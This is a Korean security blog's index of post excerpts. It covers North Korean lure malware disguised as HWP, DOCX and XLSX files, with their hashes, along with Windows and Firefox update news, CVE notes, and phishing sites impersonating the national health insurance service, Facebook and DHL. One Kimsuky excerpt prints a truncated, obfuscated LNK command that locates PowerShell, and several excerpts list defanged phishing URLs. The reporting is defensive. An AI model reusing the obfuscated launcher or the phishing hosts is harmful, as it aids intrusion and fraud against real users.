오늘도 존경 전혀 하기 쉽지 않은 북한 해킹조직 코니(Konni) 위장문서 부가세납부서(국세징수법 시행규칙)통해 악성코드에 대해 글을 적어보겠습니다.해당 악성코드는 부가세납부서(국세징수법 시행규칙-별지 제1호서식)라는 제목으로 위장 하고 있으며 마치 hwp 확장자와 아이콘을 사용하고 있어서 hwp 관련 문서인 것처럼 보이지만 실제적으로는 lnk 파일 로 위장하는 것이 특징입니다.파일명: 부가세납부서(국세징수법 시행규칙-별지 제1호서식)사이즈:1 MBMD5:68a92a2df9d7be6e36bc3efa7d37cebcSHA-1:2d27304151fc8299288feb08464007912606c527SHA-256:990c0f2ec42713e0f7d49458da7446f1eee2e640f6ebcce519c2e38..
WinRAR 파일 보관 솔루션의 취약점을 악용하면 Mark of the Web(MotW) 보안 경고를 우회하고 Windows 컴퓨터에서 임의의 코드를 실행할 수 있습니다.해당 보안 문제는 CVE-2025-31334로 추적되었으며 현재 최신 릴리스인 7.11을 제외한 모든 WinRAR 버전에 영향을 줍니다.웹 마크는 인터넷에서 다운로드한 파일을 잠재적으로 안전하지 않은 것으로 태그 지정하는 메타데이터 값(대체 데이터 스트림인 존 식별자) 형태의 Windows 보안 기능MotW 태그가 있는 실행 파일을 열 때 윈도우 는 해당 파일이 인터넷에서 다운로드되었으며 유해할 수 있다는 경고를 사용자에게 표시하고 실행을 계속할지 아니면 종료할지 옵션을 제공실행 파일에 대한 심볼릭 링크CVE-2025-31334 취약점은..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스에서 윈도우 7 운영체제를 사용하는 다른 브라우저들은 지원을 끊어서 브라우저 보안 업데이트 및 기타 지원을 받지 못했습니다. 다만, 예외적인지 모르겠지만, 파이어폭스는 115를 통해 Windows 7을 계속 지원하고 있었습니다.이제 모질라에서도 이제는 2년이라는 시간을 주었으니 윈도우 11로 넘어가라고 하는 것 같습니다.Firefox 115 ESR은 2025년 9월까지 지원되며 해당 파이어폭스를 실행하는 사용자는 2025년 9월까지 보안 업데이트를 계속 받게 될 것입니다.Windows 8.1 및 MacOS 10.12 ~ 10.14에도 동일하게 적용하게 적용이 됩니다.September 16까지 ESR 은 지원을 받게 됩니다. 뭐 전 세계적으로 아직도 윈도우 ..
오늘은 Kimsuky(김수키)에서 만든 공적조서(개인,양식)로 위장한 악성코드인 공적 조서(개인,양식).lnk 에 대해 글을 적어보겠습니다.일단 해당 악성코드는 lnk 파일 형식으로 돼 있으며 해당 악성코드를 열어 보면 PowerShell 로 동작을 합니다.StringData{ namestring: relativepath: not present workingdir: not present commandlinearguments: /k for /f "tok(e)ns=*" %a in ('dir C:\Windows\SysW(o)w64\WindowsPowerS(h)ell\v1.0\*rshel(l).exe /s /b /od') do c(a)ll %a "$dirPath = Get-L..
NordVPN(노드 VPN) 에서 양자 컴퓨팅에 대한 내성을 위한 새로운 기능인 NordVPN(노드 VPN) 포스트 퀀텀 기능을 추가했습니다.먼저 양자 컴퓨터에 대해 알아보아야 합니다.양자 컴퓨터라는 것은 양자역학에서 양자 얽힘, 중첩, 텔레포테이션 등의 효과를 이용해 계산하는 컴퓨터입니다. 즉 기존의 컴퓨터 0,1 이 아닌 0과 1을 동시에 공존시킬 수가 있는 컴퓨터를 이야기합니다.현존 최고의 슈퍼 컴퓨터가 수백 년이 걸려도 풀기 어려운 문제도 단 몇 초 이내의 어마어마한 속도로 빠르게 풀 수이었어요 가 있는 능력이 부여된다는 뜻이며 이렇게 되면 긍정적인 문제가 있겠지만, 부정적으로 암호들이 쉽게 해독이 될 수가 있다는 것입니다. 즉 기존의 암호는 크게 인수분해, 이산 로그, 타원곡선 이산 로그 문제 ..
마이크로소프트에서 제공하는 OS인 윈도우 10,윈도우 11 에 대한 각각 KB5048652,KB5048667,KB5048685 보안 업데이트가 진행이 되었습니다.윈도우 10KB5048652의 새로운 기능KB5048652 업데이트에는 장치 마더보드를 교체하고 윈도우 10이 활성화되지 못하게 하는 버그를 포함하여 Windows 10의 수많은 버그에 대한 수정 사항이 포함Sysprep /generalize]수정됨: 해당 명령은 0x80073cf 오류로 말미암아 실패 속성을 이미 제거하고 패키지를 제거하려고 할 때 발생앱 목록 백업 수정됨:Win32 바로가기가 클라우드에 백업 되지 않을 수 있음클라우드 파일 복사 수정됨: 클라우드 파일 제공자 폴더에서 파일을 끌어서 놓으면 복사본이 아닌 이동이 발생할 수 있음마..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스(Firefox)에서 보안 업데이트및 번역 개선 및 자동 Picture-in-Picture 모드 가 추가 및 수정되었습니다.Firefox의 새 버전에는 이미 검토된 자동 PIP(Picture-in-Picture) 모드, 브라우저의 번역 기능 개선, 새로운 기능을 조기에 시험해 볼 수 있는 새로운 Firefox Labs 섹션 등 여러 가지 새로운 기능이 도입파이어폭스 130.0 변경 사항Firefox 번역 개선Firefox 130에는 내장된 개인 정보 보호 번역 기능에 대한 두 가지 주요 개선 사항이 제공지원되는 언어는 카탈로니아어, 크로아티아어, 체코어, 덴마크어, 인도네시아 어, 라트비아어, 리투아니아어, 루마니아어, 세르비아어, 슬로바키아어, 베트남 어..
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 강연의뢰서_근로신청서 관련의 건. docx.lnk(2024.7.9)에 대해 글을 적어 보겠습니다.2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 근로신청서 관련의 건으로 위장하는 악성코드이며 그냥 보면 워드 파일인 것처럼 보이지만 아이콘을 잘 보면 링크 파일인 것을 확인할 수가 있습니다.해쉬값파일명: 근로신청서 관련의 건.docx.lnk사이즈:17.1 KBMD5:21d12dc7f08752293847af6ed19df0e3SHA-1:5..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 KB5037768,KB5037771 보안 업데이트가 진행이 되었습니다.시작 메뉴의 계정 알림과 잠금 화면의 위젯을 포함하여 20가지 변경 사항 적용Windows 10 KB5037768의 새로운 기능대부분은 Windows 10 KB5037768 업데이트는 대부분 버그 수정 및 개선 사항으로 구성그러또한 해당 업데이트에는 총 20개의 수정 사항 또는 변경 사항이 포함되어 있으며 그 중 주요 내용은 아래에 나열되어 있음해당 업데이트는 VPN 연결 실패를 일으킬 수 있는 알려진 문제를 해결해당 문제는 2024년 4월 9일 이후의 업데이트를 설치하고 발생Microsoft 계정에 대한 계정 관련 알림 출시를 시작Microsoft 계정은 Wind..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스(Firefox)에 대한 Firefox 126(파이어폭스 126)보 안 업데이트가 진행이 되었습니다. 해당 주목할 만한 점은 사이트 추적 기능이 없는 브라우저 사본 개선, M3 Mac의 AV2 하드웨어 디코드 가속 지원 및 새로운 검색 원격 측정입니다.Mozilla는 모든 개발 에디션과 Firefox ESR을 동시에 업데이트를 진행을 합니다.파이어폭스 115.11 ESRFirefox 127 베타 및 개발자파이어폭스 128 나이틀리안드로이드용 파이어폭스 126입니다.파이어폭스 126.0 변경 사항사이트 추적 없이 복사(링크)사이트 추적 없이 복사 및 사이트 추적 없이 링크 복사를 사용하면 사용자가 추적 매개변수 없이 URL을 복사할 수 있습니다. 해당 기능은..
마이크로소프트에서 제공하는 운영체제인 윈도우 11 24H2 기능 업데이트의 시스템 요구 사항을 변경합니다.마이크로소프트는 윈도우 11을 출시하면서 최소 시스템 요구 사항을 크게 변경했고 이로 말미암아 수백만 대의 Windows 10 장치가 Windows 11로 개량되지 못하게 되었습니다.이제 Microsoft가 Windows 11의 시스템 요구 사항을 다시 이미 출시된 운영 체제의 시스템 요구 사항을 변경사항을 변경합니다.발생한 상황2024년 2월에 Windows 11 테스터는 운영 체제가 특정 장치에 더는 설치되지 않는다는 사실을 발견하기 시작했습니다. 이 문제는 장치 프로세서와 관련된 새로운 제한 사항으로 빠르게 확인프로세서가 소위 POPCNT 지침을 지원하지 않으면 Windows 11 테스트 빌드 ..
오늘은 북한 해킹 단체 APT37 Reaper(리퍼)에서 만든 악성코드인 (안보칼럼) 반국가세력에 안보기관이 무기력해서는 안된다.zip(2024.02.22) 에 대해 알아보겠습니다. Reaper 또는 Group123 이라고 부르고 있고 Reaper(리퍼) 라고 부르는 APT 공격 단체이며 2012년부터 활동을 시작했고 정보 수집, 정찰 및 사이버 스파이 활동을 목적으로 하며, 정부, 군사, 대기업, 인권 단체를 대상으로 하고 있으며 즉 한국의 외교 및 국내 문제에 초점이 맞추어져 있으며 일본, 베트남, 중동 및 기타 지역의 기업을 대상으로 해서 회사 기밀 등을 탈취하고 있습니다.(화학,전자,제조,항공 우주, 자동차,의료) APT37,Inky Squid,RedEyes,ScarCruft,Ricochet Ch..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스 122(Firefox 122)에 대한 보안 업데이트가 진행이 되었습니다. 공식 Firefox 122.0 및 Firefox 115.7 ESR 릴리스 날짜는 2024년 1월 23일 안드로이드 스마트폰 파이어폭스는 버전은 안정 버전과 같은 일정을 따르며 또한 버전 122.0으로 업데이트 됩니다. Firefox 122.0 주요 변경 사항 주소 표시줄 추천 변경사항 파이어폭스는 검색 결과의 이미지와 텍스트 설명을 표시할 수 있으며 해당 기능은 선택한 검색 엔진에서 지원되어야 합니다. 두 번째 제안 관련 변경 사항은 브라우저 사용자가 웹 개발 관련 정보를 검색할 때 MDN Web Docs 기사 제안을 반환합니다. 기타 변경 사항 및 수정 사항 파이어폭스는 사용자 개..
오늘은 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 주요도시 시장가격 조사 2023.xlsx.bin(2023.12.29)에 대해 글을 적어 보겠습니다. 해당 악성코드는 파일명:주요도시 시장가격 조사 2023.xlsx 사이즈:35.4 KB MD5:28d25a4021536394fd890c4b6d9b5551 SHA-1:39c97ca820f31e7903ccb190fee02035ffdb37b9 SHA-256: 44365e0bcd77f1721d061dc03dd3c1728ad36671ad294ec7b2cf088b1bbefd23 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 ..
오늘은 북한 해킹 단체 Konni(코니) 에서 첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙) 사칭한 악성코드에 대해 글을 적어 보겠습니다. 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체입니다. 일단 기본적으로 미끼(Decoy) 문서를 사용자에게 표시한 다음 피해자 컴퓨터에서 악성 파일을 실행합니다. 보통은 한글과 컴퓨터에서 만들어서 배포하는 포멧인 hwp에서는 악성코드가 없겠지 생각을 하지만 해당 포멧을 자주 이용하고 있으며 먼저 압축 파일 해쉬값은 다음과 같습니다. 파일명:첨부1.취득자..
모질라 재단에서 배포를 하는 브라우저인 파이어폭스 브라우저에 대한 Firefox 121(파이어폭스 121)보 안 업데이트 및 기능 업데이트 가 진행이 되었습니다. 해당 업데이트 2023년 Firefox 웹 브라우저의 마지막 주요 릴리스 이니다. Windows의 AV1 하드웨어 디코딩 지원, macOS 시스템의 음성 명령 지원 또는 Linux의 기본값인 Wayland로의 전환과 같은 주요 변경 사항이 도입되었습니다. Firefox 121.0(파이어폭스) 주요 변경 사항 Wayland Compositor는 Linux의 기본값 Firefox는 Linux에서 기본적으로 XWayland 대신 Wayland Compositor를 사용합니다. Mozilla는 이를 통해 터치패드 및 터치스크린 제스처, 스와이프하여 탐..
오늘은 국민건강보험 공단 피싱 사이트 인 hwanssa(.)xyz(2023.9.18)에 대해 글을 적어 보겠습니다. 일단 예전에는 윈도우 환경에서 들어오면 해당 사이트를 국민건강보험으로 넘어가던 것이 번은 윈도우 환경에서도 접속되었습니다. 안드로이드 이고 컴퓨터 이고 애플 아이폰 이든 접속을 하고 파일을 다운로드 할 수가 있지만, 악성코드는 안드로이드 스마트폰 사용자를 노리는 사이트입니다. 물론 해당 애플 아이폰 사용자 분들은 악성코드는 설치할 수가 없지만, 전화번호를 입력하면 다른 전화금융사기를 통해서 피해가 우려될 수도 있습니다. 예전에는 KMI 한국의학연구소로 넘겨 버렸는데 이제는 진짜 국민건강보험공단으로 날려 버립니다. 한마디로 오직 안드로이드 스마트폰을 사용하는 분들을 공격하기 위해서 만들어진 ..
오늘은 페이스북 비즈니스 계정 사칭 피싱 사이트 인 account fb reserve 5e029(.)web(.)app(2023.9.9) 에 대해 글을 적어 보겠습니다. 페이스북은 2004년 2월 4일에 시작된 미국의 소셜 미디어 입니다.해당 피싱 사이트는 페이스북 비즈니스 계정으로 속이는 피싱 사이트 입니다. 일단 해당 피싱 사이트 주소는 다음과 같습니다. https://account-fb-reserve-5e029(.)web(.)app/ 입니다. 해당 사이트 접속 시 화면에 다음과 같은 내용을 확인할 수가 있습니다. We have received multiple reports that suggest that your account has been in violation of our terms of ser..
오늘은 국민건강보험 공단 피싱 사이트 인 nhtagse(.)store 에 대해 글을 적어 보겠습니다. 일단 예전에는 윈도우 환경에서 들어오면 해당 사이트를 국민건강보험으로 넘어가던 것이 번은 윈도우 환경에서도 접속되었습니다. 안드로이드이고 컴퓨터이고 애플 아이폰이든 접속을 하고 파일을 다운로드 할 수가 있지만, 악성코드는 안드로이드 스마트폰 사용자를 노리는 사이트입니다. 물론 해당 애플 아이폰 사용자 분들은 악성코드는 설치할 수가 없지만, 전화번호를 입력하면 다른 전화금융사기를 통해서 피해가 우려될 수도 있습니다. 예전에는 KMI 한국의학연구소로 넘겨 버렸는데 이제는 진짜 국민건강보험공단으로 날려 버립니다. 한마디로 오직 안드로이드 스마트폰을 사용하는 분들을 공격하기 위해서 만들어진 것 같습니다. 일단은..
오늘은 국민건강보험 공단 피싱 사이트 인 yhasns(.)lol(2023.9.2)에 대해 글을 적어 보겠습니다. 일단 예전에는 윈도우 환경에서 들어오면 해당 사이트를 국민건강보험으로 넘겨지고 사파리 즉 iOS 인 애플 아이폰 등도 마찬가지였지만 지금은 어느 환경에서 사용해서 접속해도 해당 피싱 사이트는 접속이 이루어집니다. 안드로이드이고 컴퓨터이고 애플 아이폰이든 접속을 하고 파일을 다운로드 할 수가 있지만, 악성코드는 안드로이드 스마트폰 사용자를 노리는 사이트입니다. 물론 해당 애플 아이폰 사용자 분들은 악성코드는 설치할 수가 없지만, 전화번호를 입력하면 다른 전화금융사기를 통해서 피해가 우려될 수도 있습니다. 예전에는 KMI 한국의학연구소로 넘겨 버렸는데 이제는 진짜 국민건강보험공단으로 날려 버립니다..
2023년 8월 선택적 업데이트를 설치를 한 컴퓨터에서 일부 컴퓨터 환경에서 UNSUPPORTED_PROCESSOR 블루스크린가 발생을 했습니다. UNSUPPORTED_PROCESSOR 오류는 KB5029351의 문제로 말미암아 발생한 것이 아니며 특정 프로세서 하위 집합으로 제한된다는 사실을 발견했습니다. 영향을 받는 윈도우 버전 Windows 11 22H2 및 Windows 10 21H2,윈도우 10 22H2 Microsoft(마이크로소프트)에서는 문제가 계속 발생하는 경우 사용자가 장치의 프로세서 제조업체(예:Intel 및 AMD)에 문의해야 한다고 제안하지만 대만 PC 공급업체 MSI만이 일부 마더보드 모델 사용자가 이 알려진 문제의 영향을 받을 수 있음을 공식적으로 확인했습니다. MSI와 Mic..
오늘은 국민건강보험 공단 피싱 사이트 인 yhasns(.)lol 에 대해 글을 적어 보겠습니다. 일단 예전에는 윈도우 환경에서 들어오면 해당 사이트를 국민건강보험으로 넘겨지고 사파리 즉 iOS 인 애플 아이폰 등을 사용해서 접속해도 해당 피싱 사이트는 접속이 이루어집니다. 안드로이드이고 컴퓨터이고 애플 아이폰이든 접속을 하고 파일을 다운로드 할 수가 있지만, 악성코드는 안드로이드 스마트폰 사용자를 노리는 사이트입니다. 물론 해당 애플 아이폰 사용자 분들은 악성코드는 설치할 수가 없지만, 전화번호를 입력하면 다른 전화금융사기를 통해서 피해가 우려될 수도 있습니다. 예전에는 KMI 한국의학연구소로 넘겨 버렸는데 이제는 진짜 국민건강보험공단으로 날려 버립니다. 일단은 해당 사이트에 인증서는 없어서 금방 피싱(..
비밀번호 관리를 도와주는 프로그램인 KePass 에서 CVE-2023-3278 취약점 인한 마스터 암호를 복구 문제가 발생했습니다. 시스템이 실행 중이 아니거나 잠기지 않은 경우에도 시스템 메모리 덤프에서 마스터 암호를 복구할 수 있는 문제입니다. KeePass의 개발자인 Dominik Reichl은 향후 2개월 내에 릴리스될 예정인 KeePass 2.54 릴리스에서 패치를 진행할 예정입니다. 해당 문제를 발견한 연구원은 KeePass 2.X Master Password Dumper 도구는 메모리 덤프(예: pagefile.sys, hiberfil.sys 또는 KeePass 프로세스 덤프)를 분석하여 마스터 암호를 일반 텍스트로 반환하는 소스를 공개했습니다. 취약점은 첫 번째 암호를 제외한 마스터 암호의..
오늘은 유럽 연합(EU)을 겨냥한 것으로 추정되는 라자루스(Lazarus)에서 만든 워드 악성코드인 Interview.doc(2023.4.28)에 대해 글을 적어 보겠습니다. 일단 해당 악성코드의 해쉬값은 다음과 같습니다. 파일명:Interview.doc 사이즈:91.0 KB CRC32:68212d70 MD5:292fbbf7e2ab20b12f4f2c0464a5b774 SHA-1:d21add8bee4feefe812b0c16a6a541bbdec14263 SHA-256:69ef7c4cb3849283c03eaa593b02ebbfd1d08d25ef9a58355d2a9909678d6c6d SHA-512:7b7d742994458f581c83b82f84dac3f44f41b9d7ad314f19071a563ee699afc..
오늘은 디지바이트(DigiByte) 문서로 위장한 악성코드인 What is DigiByte.doc 에 대해 글을 적어 보겠습니다. 일단 해당 악성코드는 제목이 What is DigiByte 한마디로 디지바이트는 무엇이냐 라는 제목으로 된 악성코드로 디지바이트(DigiByte)는 다른 암호화폐보다 빠르면 디지바이트(DigiByte)는 디지털 자산, 스마트 계약, 탈중앙화된 애플리케이션, 보안 인증 등에 활용할 수 있는 신뢰받는 혁신적인 블록체인이라고 돼 있었습니다. 디지바이트(DigiByte)는 2013년 말 처음 만들어지고, 2014년 초 출시된 오픈소스를 기반으로 한 블록체인으로 현재까지도 급성장하고 있다고 합니다. 해당 악성코드는 지능적이고(Advanced) 지속적인(Persistent) 공격(Thr..
오늘은 일본 ETC 서비스로 위장한 피싱 메일 etcamaisei swftc cc에 대해 알아보겠습니다. 개인적으로 일본 피싱 메일을 최근에 자주 받아 보는 것 같습니다. 일단 해당 ETC가 도대체 무엇인지 몰라서 한번 야후 재팬에 검색을 해보았습니다. 일단 보니까 ETC(Electronic Toll Collection System)이라고 해서 전자요금수수시스템이라고 해서 5.8GHz대의 액티브 방식 DSRC (협력 통신)에 의한 무선 통신을 이용하여 통행 차량의 요금 수수를 하는 시스템이며 한국으로 치면 하이패스 시스템하고 비슷하다고 생각을 하시면 됩니다. 일단 해당 야후 재팬을 통해서 해당 ETC 공식 사이트에 접속해 보니까 해당 부분을 악용해서 피싱 메일을 보내는 것을 확인했고 일본에서도 ETC 서..
오늘은 DHL 사칭 피싱 메일인 huonganphat 에 대해 글을 적어 보겠습니다. DHL 익스프레스(DHL Express)는 독일의 배송사 이며 1969년에 설립된 세계적인 종합 우편/물류 서비스 회사로, 현재는 독일 도이체 포스트의 자회사이며 국제 배송 및 특송 사업 부문을 하고 있으며 한국에서는 해외직구를 이용을 할 때도 자주 사용을 하기도 합니다. 일단 오늘 온 이메일 내용은 다음과 같습니다. 피싱 사이트 https://huonganphat.com(.)vn/dhl/NewDHL/NewDHL/view/mydhl/?email=???????@?????(.)com 이며 이메일 내용은 다음과 같습니다. YOUR PARCEL IS ON ITS WAY Your DHL Express shipment it's o..
마이크로소프트에서 제공하는 운영체제인 윈도우 에 대한 보안 업데이트가 진행이 되었습니다.윈도우 10은 KB5022282,KB5022286 윈도우 11 KB5022303, KB5022287입니다. 그리고 이번에는 윈도우 7,윈도우 8.1 은 마지막 보안 업데이트 이면 더는 더는 기술 지원을 하지 않습니다. 한마디로 윈도우 10,윈도우 11 로 보안 업데이트를 하셔야 합니다. 요약 Windows 7 및 Windows 8.1 지원이 오늘 종료 Microsoft는 2023년 1월 10일 이후 두 운영 체제에 대한 보안 업데이트를 더는 배포하지 않습니다. Microsoft는 Visual Studio Code, .NET Core, Microsoft Office 및 Microsoft Exchange Server를 비..
오늘은 일본 ETC 서비스로 위장한 피싱 메일 meisai oogril cc에 대해 알아보겠습니다. 개인적으로 일본 피싱 메일을 최근에 자주 받아 보는 것 같습니다. 일단 해당 ETC가 도대체 무엇인지 몰라서 한번 야후 재팬에 검색을 해보았습니다. 일단 보니까 ETC(Electronic Toll Collection System)이라고 해서 전자요금수수시스템이라고 해서 5.8GHz대의 액티브 방식 DSRC (협력 통신)에 의한 무선 통신을 이용하여 통행 차량의 요금 수수를 하는 시스템이며 한국으로 치면 하이패스 시스템하고 비슷하다고 생각을 하시면 됩니다. 일단 해당 야후 재팬을 통해서 해당 ETC 공식 사이트에 접속해 보니까 해당 부분을 악용해서 피싱 메일을 보내는 것을 확인했고 일본에서도 ETC 서비스가..
마이크로소프트는 2023년1월10일 윈도우 7,윈도우 8.1 에 대한 연장 지원을 완전히 종료합니다. 해당 운영체제가 설치된 컴퓨터, 노트북들은 더는 업데이트를 지원을 받지 않으며 구글 크롬, 파이어폭스, 마이크로소프트 엣지 등과 같은 브라우저 그리고 일부 프로그램은 지원 종료 후 천천히 해당 운영체제에 대한 브라우저 업데이트도 중단이 될 것입니다. 여기서 사용자가 선택하는 방법은 다음과 같습니다. 그냥 윈도우 7,윈도우 8.1 사용 한다.(해당 같은 경우 당연히 보안 업데이트가 안 되고 브라우저 등도 기술 지원을 중단할 것이므로 피곤할 것입니다.) 윈도우 10,윈도우 11 로 업그레이드(어차피 윈도우 10 도 조만간 기술 지원 종료가 될 것이므로 그냥 이참에 컴퓨터, 노트북을 새로 구매하는 것을 추천)..